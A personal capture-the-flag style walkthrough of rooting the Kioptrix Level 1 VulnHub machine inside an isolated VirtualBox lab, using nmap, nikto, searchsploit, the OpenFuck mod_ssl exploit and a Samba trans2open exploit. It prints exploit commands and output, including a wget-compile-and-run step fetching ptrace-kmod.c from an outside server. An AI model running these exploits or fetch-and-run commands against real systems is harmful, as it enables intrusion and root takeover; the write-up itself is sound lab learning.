Contents

Setup

I haven’t actually done any vulnerable VMs yet, so this starts with just getting the VM running on my system.

I downloaded the image, which is a VMWare image. I briefly looked at VMWare’s website, the fucking website was just throwing all sorts of products in my face, seemingly trying to get me to buy pro versions and it wasn’t clear how I could run it for free for personal use. I finally found the free download, HTTP 404. Cool. Whatever, I always use VBox what’s the worst that could happen?

I loaded it into VBox made my best guess at all the constraints, the vulnhub page just said ‘Linux’ for the VM, so I chose “Other Linux 64bit”.

During boot I could see the OS is Red Hat linux, might have to reboot.

It then started trying to configure devices, audio drivers all that stuff. I just said no to it all.

Booted VM

Boom looks like it’s loaded, that wasn’t so bad. I didn’t see anywhere if there was a starting login I could get access with though, back to the vulnhub page.

Nothing there… hmm. Guess I don’t get one?

I guess I should just start enumerating the server?

That’s when I realized I have my VM’s setup in a Bridged network, which I’d prefer to not be doing for obvious reasons. Welp, time to go figure out how to setup a virtual network real quick.

It was easy enough to set both my VM’s to Internal network, but when I logged my working machine I was not assigned an IP. Doing some further reading, VBox has a DHCP server you can drop onto the network. Sweet let’s do that.

# On my host machine
$  VBoxManage dhcpserver add --netname intnet  --ip 10.10.10.1  --netmask 255.255.255.0  --lowerip 10.10.10.2 --upperip 10.10.10.99 --enable
# On my Guest Working machine
$ ifconfig
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.2  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::a00:27ff:fe86:ce09  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:86:ce:09  txqueuelen 1000  (Ethernet)
        RX packets 3  bytes 1240 (1.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 19  bytes 1962 (1.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12  bytes 640 (640.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12  bytes 640 (640.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

That’s more like it. Booting back the other machine, let’s see if I can find it:

$ namp -nP 10.10.10.0/24
Warning:  You are not root -- using TCP pingscan rather than ICMP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-14 20:03 EDT
Nmap scan report for 10.10.10.3
Host is up (0.000064s latency).
All 1000 scanned ports on 10.10.10.3 are closed

Nmap done: 256 IP addresses (1 host up) scanned in 1.96 seconds

# Shit forgot root
$ sudo !!
sudo nmap  -nP 10.10.10.0/24
[sudo] password for kali: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-14 20:03 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00020s latency).
All 1000 scanned ports on 10.10.10.1 are filtered
MAC Address: 08:00:27:5A:40:A1 (Oracle VirtualBox virtual NIC)

Nmap scan report for 10.10.10.3
Host is up (0.0000040s latency).
All 1000 scanned ports on 10.10.10.3 are closed

Nmap done: 256 IP addresses (2 hosts up) scanned in 2.64 seconds

Fuck that box still isn’t getting an IP. Let’s goof with the settings and boot it again. Switched OS to redhat 64bit, and on boot I actually configured the devices it was attempting to setup.

Try again… still nothing there. God damn it!

Toying with this for a while, I figured out I just needed to select the correct network interface.

$ sudo nmap -nP 10.10.10.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-14 20:46 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00032s latency).
All 1000 scanned ports on 10.10.10.1 are filtered
MAC Address: 08:00:27:5A:40:A1 (Oracle VirtualBox virtual NIC)

Nmap scan report for 10.10.10.4
Host is up (0.00040s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
32768/tcp open  filenet-tms
MAC Address: 00:0C:29:7C:3A:16 (VMware)

Nmap scan report for 10.10.10.3
Host is up (0.0000040s latency).
All 1000 scanned ports on 10.10.10.3 are closed

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.35 seconds

Finally! Boy I waisted a lot of time just getting things setup… I only have a few minutes left set aside for this for the night.

Get root

Alright, move quick!

# Get some more in depth info on the host, let this run while I move on
$ sudo nmap -p- -sV -sS -T4 -A -oX lvl1.xml 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-14 20:53 EDT
Nmap scan report for 10.10.10.4
Host is up (0.00050s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd (workgroup: WMYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-07-15T04:54:56+00:00; +3h59m59s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 3h59m58s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.97 seconds

The two interesting ports here are HTTP and SMB, so I ran Dirbuster with the /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt list:

Dirbuster

Cool, few things to work with there! While I let that finish, I also ran a nikto scan.

$ nikto  --host 10.10.10.4
$ sudo nikto --host 10.10.10.4
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.4
+ Target Hostname:    10.10.10.4
+ Target Port:        80
+ Start Time:         2020-07-15 20:49:36 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8672 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2020-07-15 20:49:57 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Wow okay, let’s see what we can find for the outdated apache server:
”`$ searchsploit apache 1.3.20


Exploit Title | Path


Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 1.3.20 (Win32) - ‘PHP.exe’ Remote File Disclosure | windows/remote/21204.txt
Apache 1.3.61.3.91.3.111.3.121.3.20 - Root Directory Access | windows/remote/19975.pl
Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure | linux/remote/132.c
Apache < 1.3.372.0.592.2.3 mod_rewrite - Remote Overflow | multiple/remote/2237.sh
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow | linux/dos/41769.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
Apache CouchDB < 2.1.0 - Remote Code Execution | linux/webapps/44913.py
Apache CXF < 2.5.102.6.72.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - ‘OpenFuck.c’ Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - ‘OpenFuckV2.c’ Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - ‘OpenFuckV2.c’ Remote Buffer Overflow (2) | unix/remote/47080.c
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit) | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit) | multiple/remote/17691.rb
Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - ‘utf8’ Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - ‘utf8’ Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - ‘PDF/Docx’ Server Side Denial of Service | php/dos/44057.md
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution | linux/remote/34.pl


Shellcodes: No Results


Alright 'OpenFuck' seems to match our target environment, let's try the latest version?
```bash
$ cp  /usr/share/exploitdb/exploits/unix/remote/47080.c .
... The header comment ...
/*
 * OF version r00t VERY PRIV8 spabam
 * Version: v3.0.4 
 * Requirements: libssl-dev    ( apt-get install libssl-dev )
 * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
 * objdump -R /usr/sbin/httpd|grep free to get more targets
 * #hackarena irc.brasnet.org
 * Note: if required, host ptrace and replace wget target
 */
# Reading the exploit we have to choose an arch, I think we  either want 0x6a or 0x6b
$ sudo ./OpenFuck  0x6a 10.10.10.4 443 -c 50

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
Good Bye!

$ sudo ./OpenFuck  0x6b 10.10.10.4 443 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--01:17:36--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... 
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ 
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)

Huh, we got onto the server but we’re not root… Seems like the code had a stale url dl.packetstormsecurity.net.

Sure enough, a line in the code is #define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr>

I try running the wget command from my working box, and realize I’m just not letting my environment access the internet, duh.

Alright, I switch my working machine onto a bridged network, download the file a and serve it up on an apache server on my machine.

$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe86:ce09  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:86:ce:09  txqueuelen 1000  (Ethernet)
        RX packets 50585  bytes 10059453 (9.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 52044  bytes 5925586 (5.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4960  bytes 297484 (290.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4960  bytes 297484 (290.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

[email protected]:~$ wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
--2020-07-15 21:27:24--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
Resolving dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200
Connecting to dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3921 (3.8K) [text/x-csrc]
Saving to: ‘ptrace-kmod.c’

ptrace-kmod.c                         100%[======================================================================>]   3.83K  --.-KB/s    in 0s      

2020-07-15 21:27:24 (152 MB/s) - ‘ptrace-kmod.c’ saved [3921/3921]
$ python -m SimpleHTTPServer &

Now I edit the command to grab the file from 10.10.10.3:8000/ptrace-kmod.c, recompile, and try again!

$ gcc -o OpenFuck 47080.c -lcrypto
$ sudo ./OpenFuck  0x6b 10.10.10.4 443 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
xploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; -kmod.c; gcc -o e 
--01:30:35--  http://10.10.10.3:8000/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to 10.10.10.3:8000... connected!
HTTP request sent, awaiting response... 10.10.10.4 - - [15/Jul/2020 21:30:37] "GET /ptrace-kmod.c HTTP/1.0" 200 -
200 OK
Length: 3,921 [text/plain]

    0K ...                                                   100% @   3.74 MB/s

01:30:35 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

gcc: file path prefix `/usr/bin' never used
[+] Attached to 1553
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Hell yes!

Dig for loot

I guess I’ll do some exploring to see if there’s any juice?

grep -r "flag"
Good Bye!

Shit, I just lost my shell… I have a lot to learn. Lucky running the same exploit again I get back in.

Checking the running processes:

USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.8  0.0  1412  520 ?        S    01:45   0:04 init
root         2  0.0  0.0     0    0 ?        SW   01:45   0:00 [keventd]
root         3  0.0  0.0     0    0 ?        SW   01:45   0:00 [kapm-idled]
root         4  0.0  0.0     0    0 ?        SWN  01:45   0:00 [ksoftirqd_CPU0]
root         5  0.0  0.0     0    0 ?        SW   01:45   0:00 [kswapd]
root         6  0.0  0.0     0    0 ?        SW   01:45   0:00 [kreclaimd]
root         7  0.0  0.0     0    0 ?        SW   01:45   0:00 [bdflush]
root         8  0.0  0.0     0    0 ?        SW   01:45   0:00 [kupdated]
root         9  0.0  0.0     0    0 ?        SW<  01:45   0:00 [mdrecoveryd]
root        13  0.0  0.0     0    0 ?        SW   01:45   0:00 [kjournald]
root        88  0.0  0.0     0    0 ?        SW   01:45   0:00 [khubd]
root       204  0.0  0.0     0    0 ?        SW   01:46   0:00 [kjournald]
root       205  0.0  0.0     0    0 ?        SW   01:46   0:00 [ps -aux
kjournald]
root       206  0.0  0.0     0    0 ?        SW   01:46   0:00 [kjournald]
root       207  0.0  0.0     0    0 ?        SW   01:46   0:00 [kjournald]
root       550  0.0  0.0   444  188 ?        S    01:46   0:00 /sbin/dhcpcd -n e
root       653  0.0  0.0  1472  592 ?        S    01:46   0:00 syslogd -m 0
root       658  0.0  0.1  2096 1192 ?        S    01:46   0:00 klogd -2
rpc        678  0.0  0.0  1552  588 ?        S    01:46   0:00 portmap
rpcuser    706  0.0  0.0  1684  832 ?        S    01:46   0:00 rpc.statd
root       818  0.0  0.0  1396  524 ?        S    01:46   0:00 /usr/sbin/apmd -p
root       874  0.0  0.1  2676 1268 ?        S    01:46   0:00 /usr/sbin/sshd
root       907  0.0  0.0  2264  944 ?        S    01:46   0:00 xinetd -stayalive
root       948  0.0  0.2  5312 2068 ?        S    01:46   0:00 sendmail: accepti
root       967  0.0  0.0  1440  484 ?        S    01:46   0:00 gpm -t ps/2 -m /d
root       985  0.0  0.0  1584  660 ?        S    01:46   0:00 crond
root      1015  0.0ps -aux
  0.0  1460  680 ?        S    01:46   0:00 anacron
daemon    1033  0.0  0.0  1444  568 ?        S    01:46   0:00 /usr/sbin/atd
root      1039  0.0  0.1  2416 1088 ?        S    01:46   0:00 nmbd
root      1041  0.0  0.1  3256 1192 ?        S    01:46   0:00 smbd
# A TON of these processes (I suppose 50 for the connection count?) what a noisy exploit
apache    1551  0.0  0.2  6612 2752 ?        S    01:52   0:00 httpd -D HAVE_SSL

Continuing to look around for something…

$ ls -al /root
total 12
drwxr-x---    2 root     root         1024 Sep 26  2009 .
drwxr-xr-x   19 root     root         1024 Jul 16 01:46 ..
-rw-r--r--    1 root     root         1126 Aug 23  1995 .Xresources
-rw-------    1 root     root          147 Oct 12  2009 .bash_history
-rw-r--r--    1 root     root           24 Jun 10  2000 .bash_logout
-rw-r--r--    1 root     root          234 Jul  5  2001 .bash_profile
-rw-r--r--    1 root     root          176 Aug 23  1995 .bashrc
-rw-r--r--    1 root     root          210 Jun 10  2000 .cshrc
-rw-r--r--    1 root     root          196 Jul 11  2000 .tcshrc
-rw-r--r--    1 root     root         1303 Sep 26  2009 anaconda-ks.cfg
$ ls /var/ftp
bin
etc
lib
pub
ls  /var/ftp/etc
group
ld.so.cache
ld.so.conf
passwd
$ cat /var/ftp/etc/passwd   
root:*:0:0:::
bin:*:1:1:::
operator:*:11:0:::
ftp:*:14:50:::
nobody:*:99:99:::
$  cat /var/mail/root
From root  Sat Sep 26 11:42:10 2009
Return-Path: <[email protected]>
Received: (from [email protected])
        by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
        for [email protected]; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 wont be as easy...

From root  Thu Jul 16 01:51:15 2020
Return-Path: <[email protected]>
Received: (from [email protected])
        by kioptrix.level1 (8.11.6/8.11.6) id 06G5pFH01306
        for root; Thu, 16 Jul 2020 01:51:15 -0400
Date: Thu, 16 Jul 2020 01:51:15 -0400
From: root <[email protected]>
Message-Id: <[email protected]>
To: [email protected]
Subject: LogWatch for kioptrix.level1



 ################## LogWatch 2.1.1 Begin ##################### 


 ###################### LogWatch End #########################

Ah there we go that makes me happy enough, that’s enough of a flag for me!

Second way in

They did say there’d be multiple ways in though, and I know that SMB port is very suspect.

$ msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 auxiliary(scanner/smb/smb_version) > set THREADS 11
THREADS => 11
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.4:139        - Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf5 auxiliary(scanner/smb/smb_version) > searchsploit samba 2.2.1
[*] exec: searchsploit samba 2.2.1

----------------------------------------- ---------------------------------
 Exploit Title                           |  Path
----------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open O | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code  | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow    | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service  | linux_x86/dos/36741.py
----------------------------------------- ---------------------------------
Shellcodes: No Results

msf5> exit

$ cp /usr/share/exploitdb/exploits/multiple/remote/10.c .
$ less 10.c
$ gcc 10.c -o 10
$ ./10 -b 0 -v 10.10.10.4
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
ls
exploit
install.log
id
uid=0(root) gid=0(root) groups=99(nobody)

Easy money.

Directory
$ cd content && tree